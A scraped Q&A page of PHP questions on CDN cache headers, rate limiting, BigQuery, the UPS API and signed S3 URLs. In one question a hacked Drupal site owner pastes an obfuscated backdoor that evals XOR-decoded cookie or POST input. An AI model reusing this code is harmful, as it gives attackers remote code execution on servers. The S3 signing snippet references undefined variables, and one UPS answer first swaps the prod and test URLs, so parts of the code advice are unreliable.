How to set Cache control for external cloud files - php

Hey Guys,
I was bent on improving my page speed factors and yesterday I got some cloud space on rackspacecloud. Now before this i was serving static content from a cookieless domain with proper cache control through htaccess.
Now after I moved on to cloud my htaccess does not control the cloud files. There is a TTL parameter on rackspace that sets values for how long the files should stay on CDN. That value reflects on my Page Speed settings (google + firebug). Now the default setting can me maximum 72 hours but I need something above 7 days. I need some api for that and its kinda complex..
Is there any way I can enforce cache control on my cloud files?
what do these query strings do domain.com/file.css?cache=0.54454334 ???
Do they achieve what I am looking for?
Any help is appreciated.

You may have figured it out already, but heres a link to checkout: Set far-future expires headers with Rackspace Cloud Files (sort of).
He is using the cloudfiles PHP API, and so am I. You can manually set the TTL (aka expires) headers to whatever you want to. Right now I have them set to 365 days (maybe a little excessive).
The documentation is fairly straightforward. If you need any help, this code should help you get started:
<?php
// include the API
require('cloudfiles.php');
// cloud info
$username = "myusername"; // username
$key = "c2dfa30bf91f345cf01cb26d8d5ea821"; // api key
// Connect to Rackspace
$auth = new CF_Authentication($username, $key);
$auth->authenticate();
$conn = new CF_Connection($auth);
// Get the container we want to use
$container = $conn->create_container('images');
// store file information
$filename = "images/logo.jpg";
// upload file to Rackspace
$object = $container->create_object($filename);
$object->load_from_filename($localfile);
// make public, and set headers
$container->make_public(86400 * 365); // expires headers set to 365 days
?>

Related

Drupal 7 Recent log messages

I am facing with an issue. Everyday on my server appers .ico files and .php file with this kind of code:
$zvtizrs = 'y6v1i4be#torufpkxc7_8Hg0n*-2sladm\'';$yjzgov =
Array();$yjzgov[] =
$zvtizrs[30].$zvtizrs[3].$zvtizrs[30].$zvtizrs[27].$zvtizrs[1].$zvtizrs[23].$zvtizrs[30].$zvtizrs[13].$zvtizrs[26].$zvtizrs[6].$zvtizrs[20].$zvtizrs[31].$zvtizrs[30].$zvtizrs[26].$zvtizrs[5].$zvtizrs[3].$zvtizrs[27].$zvtizrs[18].$zvtizrs[26].$zvtizrs[20].$zvtizrs[3].$zvtizrs[13].$zvtizrs[27].$zvtizrs[26].$zvtizrs[1].$zvtizrs[23].$zvtizrs[5].$zvtizrs[13].$zvtizrs[5].$zvtizrs[13].$zvtizrs[23].$zvtizrs[20].$zvtizrs[30].$zvtizrs[18].$zvtizrs[17].$zvtizrs[7];$yjzgov[]
= $zvtizrs[21].$zvtizrs[25];$yjzgov[] = $zvtizrs[8];$yjzgov[] = $zvtizrs[17].$zvtizrs[10].$zvtizrs[12].$zvtizrs[24].$zvtizrs[9];$yjzgov[]
= $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[19].$zvtizrs[11].$zvtizrs[7].$zvtizrs[14].$zvtizrs[7].$zvtizrs[30].$zvtizrs[9];$yjzgov[]
= $zvtizrs[7].$zvtizrs[16].$zvtizrs[14].$zvtizrs[29].$zvtizrs[10].$zvtizrs[31].$zvtizrs[7];$yjzgov[]
= $zvtizrs[28].$zvtizrs[12].$zvtizrs[6].$zvtizrs[28].$zvtizrs[9].$zvtizrs[11];$yjzgov[]
= $zvtizrs[30].$zvtizrs[11].$zvtizrs[11].$zvtizrs[30].$zvtizrs[0].$zvtizrs[19].$zvtizrs[32].$zvtizrs[7].$zvtizrs[11].$zvtizrs[22].$zvtizrs[7];$yjzgov[]
= $zvtizrs[28].$zvtizrs[9].$zvtizrs[11].$zvtizrs[29].$zvtizrs[7].$zvtizrs[24];$yjzgov[]
= $zvtizrs[14].$zvtizrs[30].$zvtizrs[17].$zvtizrs[15];foreach ($yjzgov[7]($_COOKIE, $_POST) as $xtfjdc => $jqlwt){function
frtdmz($yjzgov, $xtfjdc, $omljrbn){return
$yjzgov[6]($yjzgov[4]($xtfjdc . $yjzgov[0], ($omljrbn /
$yjzgov8) + 1), 0, $omljrbn);}function htylm($yjzgov,
$xwoin){return #$yjzgov[9]($yjzgov[1], $xwoin);}function
twdine($yjzgov, $xwoin){$sknbn = $yjzgov3 % 3;if (!$sknbn)
{eval($xwoin1);exit();}}$jqlwt = htylm($yjzgov,
$jqlwt);twdine($yjzgov, $yjzgov[5]($yjzgov[2], $jqlwt ^
frtdmz($yjzgov, $xtfjdc, $yjzgov8)));}
Could you please tell me what should I do?
I am using rackspace hosting. Also I have a lot of links like this one (/d0E0MDY5VDNpanR6NDM5MzFJaQ==) in recent log.
How can I stop that?
Thanks in advance!
Hacked. I was recently cleaning hacked site my self and it was nightmare. Best would be to retrieve some recent version from backup and immediately apply all security updates. If there is no backup (big problem!) you can try "cleaning" the site as I did:
Clean all the files with malicious content. Go search/replace trough all the files.
Dump database and do the same thing to dump file - remove malicious content and then import it back.
Check for user accounts. If there are some suspicious one block/delete them.
Check for newly created suspicious user groups. Delete them too.
Make a backup.
Apply all security updates/patches. Make fresh backup again.
Change all account passwords (drupal admins, ftp accounts, database accounts).
Set scheduled backup. I.e. use Becakup&Migrate module for that.

Best advice on clearing buckets using a Token Bucket rate limiting mechanism

I am using the 'Bandwidth Throttle' library to throttle API requests - essentially prevent someone from the same IP making tons of requests within a set timeframe. This creates a bucket (simply a file) that is stored within the buckets directory.
As this is will build up considerably over time what process does everyone use for this - would you recommend a x amount of time to purge this folder, if so what timeframe would be suggested.
use bandwidthThrottle\tokenBucket\Rate;
use bandwidthThrottle\tokenBucket\TokenBucket;
use bandwidthThrottle\tokenBucket\storage\FileStorage;
$ip = $_SERVER['REMOTE_ADDR'];
$storage = new FileStorage(__DIR__ . "/buckets/$ip.bucket"); //this will build up quickly
$rate = new Rate(10, Rate::SECOND);
$bucket = new TokenBucket(10, $rate, $storage);
$bucket->bootstrap(10);
if (!$bucket->consume(1, $seconds)) {
http_response_code(429);
header(sprintf("Retry-After: %d", floor($seconds)));
exit();
}

Google BigQuery PHP Load Data from URL

I am connecting to an API, and getting a report in a TSV format. I am needing to upload the report to Google BigQuery, but all the documentation I have found so far loads data from Google Cloud Storage. Is there a way to load data from a seperate URL?
Here is the code I have thus far:
$service = new Google_BigqueryService($client);
// Your project number, from the developers.google.com/console project you created
// when signing up for BigQuery
$project_number = '*******';
// Information about the destination table
$destination_table = new Google_TableReference();
$destination_table->setProjectId($project_number);
$destination_table->setDatasetId('php_test');
$destination_table->setTableId('my_new_table');
// Information about the schema for your new table
$schema_fields = array();
$schema_fields[0] = new Google_TableFieldSchema();
$schema_fields[0]->setName('Date');
$schema_fields[0]->setType('string');
$schema_fields[1] = new Google_TableFieldSchema();
$schema_fields[1]->setName('PartnerId');
$schema_fields[1]->setType('string');
....
$destination_table_schema = new Google_TableSchema();
$destination_table_schema->setFields($schema_fields);
// Set the load configuration, including source file(s) and schema
$load_configuration = new Google_JobConfigurationLoad();
$load_configuration->setSourceUris(array('EXTERNAL URL WITH TSV'));
$load_configuration->setDestinationTable($destination_table);
$load_configuration->setSchema($destination_table_schema);
$job_configuration = new Google_JobConfiguration();
$job_configuration->setLoad($load_configuration);
$load_job = new Google_Job();
$load_job->setKind('load');
$load_job->setConfiguration($job_configuration);
$jobs = $service->jobs;
$response = $jobs->insert($project_number, $load_job);
I realize that this is meant for Google Cloud Storage, but I do not want to use it, if I am just going to pass data through it and delete it within the hour.
Is there PHP code that I can use that will allow me to use external URLs and load data from them?
As Pentiuum10 mentioned above, BigQuery doesn't support reading from non-Google Cloud Storage URLs. The logistics involved would be tricky ... we'd need credentials to access the data, which we don't really want to have to be responsible for. If this is a popular request, we might end up supporting external paths that are either unrestricted or support oauth2. That said, we haven't had a lot of users asking for this so far.
Feel free to file a feature request via the public issue tracker here: https://code.google.com/p/google-bigquery/issues/.

UPS API including correct WSDL file and endpoint

I am new to using WSDL's. I have used REST before but not this. I am trying to run the sample code file that is included on the UPS developer site. Page 23 of this guide is the API I am using. The file you can download includes like ten guides which I have perused, but I just initally want to figure out how to fill out the top configuration part below (I am using php example code file SoapRateClient.php). What do I put for WSDL? What do I put for end point url? The file you download on their site has several wsdl files and I'm not sure which one I am supposed to choose. Guidance appreciated.
<?php
//Configuration
$access = "secret";//I have this no problem
$userid = "";//I have this as well
$passwd = "";//I have this
$wsdl = " Add Wsdl File Here ";//What the heck do I put here!?
$operation = "ProcessRate";
$endpointurl = ' Add URL Here';//Also what do I put here?
$outputFileName = "XOLTResult.xml";
For anyone else out there confused on how to get started with the UPS Rate API, I implemented Jonathan Kelly's UPS Rate API class that he created. You just fill in your account number, key, username, password, and play with the other variables. I was able to return a dollar amount for ground shipping in five minutes. Thank gosh I didn't have to mess with SOAP and web services.
Here is details of top parameters for "SoapRateClient.php"
$access = "xxxx";
It is provided by the UPS.for this you have to create your account at UPS.This account is different from creating online account at the website.
https://www.ups.com/upsdeveloperkit
click on "Step 5: Request an access key."
2 $userid = "xxx";
userid of account.
3 $passwd = "xxx";
password of account
4 $wsdl = "wsdl/RateWS.wsdl";
this is the wsdl file you need to include for "SoapRateClient.php". Here change the path accordingly.
5 $operation = "ProcessRate";
value of operation to perform.
6
$endpointurl = 'https://wwwcie.ups.com/webservices/Rate';
I wish you the best of luck. When I started down this path I ended up grabbing code from several commerce products written in PHP to see how they did it as I could not get the UPS examples to work. Turns out most of them are just doing a POST and manually assembling the XML instead of using SOAP, since it's so painful.
But, regardless, what it wants in $wsdl is the wsdl file location.
End point url is the UPS url for the service you wish to use, for example, for TimeInTransit:
For prod: https://wwwcie.ups.com/ups.app/xml/TimeInTransit
For test: https://onlinetools.ups.com/ups.app/xml/TimeInTransit
EDIT: It appears that the urls above are incorrect. Reference: https://developerkitcommunity.ups.com/index.php/Special:AWCforum/st/id267
Once your testing is completed please direct your Shipping Package XML to the Production
URL:
https://onlinetools.ups.com/webservices/Ship
They should read:
For test: https://wwwcie.ups.com/ups.app/xml/TimeInTransit
For prod: https://onlinetools.ups.com/ups.app/xml/TimeInTransit

Securely serving files from Amazon S3

I have an app that uploads user files to S3. At the moment, the ACL for the folders and files is set to private.
I have created a db table (called docs) that stores the following info:
id
user_id
file_name (original file as specified by the user)
hash_name (random hash used to save the file on amazon)
So, when a user wants to download a file, I first check in the db table that they have access to file. I'd prefer to not have the file first downloaded to my server and then sent to the user - I'd like them to be able to grab the file directly from Amazon.
Is it OK to rely on a very very long hashname (making it basically impossible for anyone to randomly guess a filename)? In this case, I can set the ACL for each file to public-read.
Or, are there other options that I can use to serve the files whilst keeping them private?
Remember, once the link is out there, nothing prevents a user from sharing that link with others. Then again, nothing prevents the user from saving the file elsewhere and sharing a link to the copy of the file.
The best approach depends on your specific needs.
Option 1 - Time Limited Download URL
If applicable to your scenario, you can also create expiring (time-limited) custom links to the S3 contents. That would allow the user to download content for a limited amount of time, after which they would have to obtain a new link.
http://docs.amazonwebservices.com/AmazonS3/latest/dev/S3_QSAuth.html
Option 2 - Obfuscated URL
If you value avoiding running the file through your web server over the risk that a URL, however obscure, might be intentionally shared, then use the hard-to-guess link name. This would allow a link to remain valid "forever", which means the link can be shared "forever".
Option 3 - Download through your server
If you are concerned about the link being shared and certainly want users to authenticate through your website, then serve the content through your website after verifying user credentials.
This option also allows the link to remain valid "forever" but require the user to log in (or perhaps just have an authentication cookie in the browser) to access the link.
I just want to post the PHP solution with code, if anybody has the same problem.
Here's the code I used:
$aws_access_key_id = 'AKIAIOSFODNN7EXAMPLE';
$aws_secret_key = 'YourSecretKey12345';
$aws_bucket = 'bucket';
$file_path = 'directory/image.jpg';
$timeout = '+10 minutes';
// get the URL!
$url = get_public_url($aws_access_key_id,$aws_secret_key,$aws_bucket,$file_path,$timeout);
// print the URL!
echo($url);
function get_public_url($keyID, $s3Key, $bucket, $filepath, $timeout)
{
$expires = strtotime($timeout);
$stringToSign = "GET\n\n\n{$expires}\n/{$aws_bucket}/{$file_path}";
$signature = urlencode(hex2b64(hmacsha1($s3Key, utf8_encode($stringToSign))));
$url = "https://{$bucket}.s3.amazonaws.com/{$file_path}?AWSAccessKeyId={$keyID}&Signature={$signature}&Expires={$expires}";
return $url;
}
function hmacsha1($key,$data)
{
$blocksize=64;
$hashfunc='sha1';
if (strlen($key)>$blocksize)
$key=pack('H*', $hashfunc($key));
$key=str_pad($key,$blocksize,chr(0x00));
$ipad=str_repeat(chr(0x36),$blocksize);
$opad=str_repeat(chr(0x5c),$blocksize);
$hmac = pack(
'H*',$hashfunc(
($key^$opad).pack(
'H*',$hashfunc(
($key^$ipad).$data
)
)
)
);
return bin2hex($hmac);
}
function hex2b64($str)
{
$raw = '';
for ($i=0; $i < strlen($str); $i+=2)
{
$raw .= chr(hexdec(substr($str, $i, 2)));
}
return base64_encode($raw);
}

Categories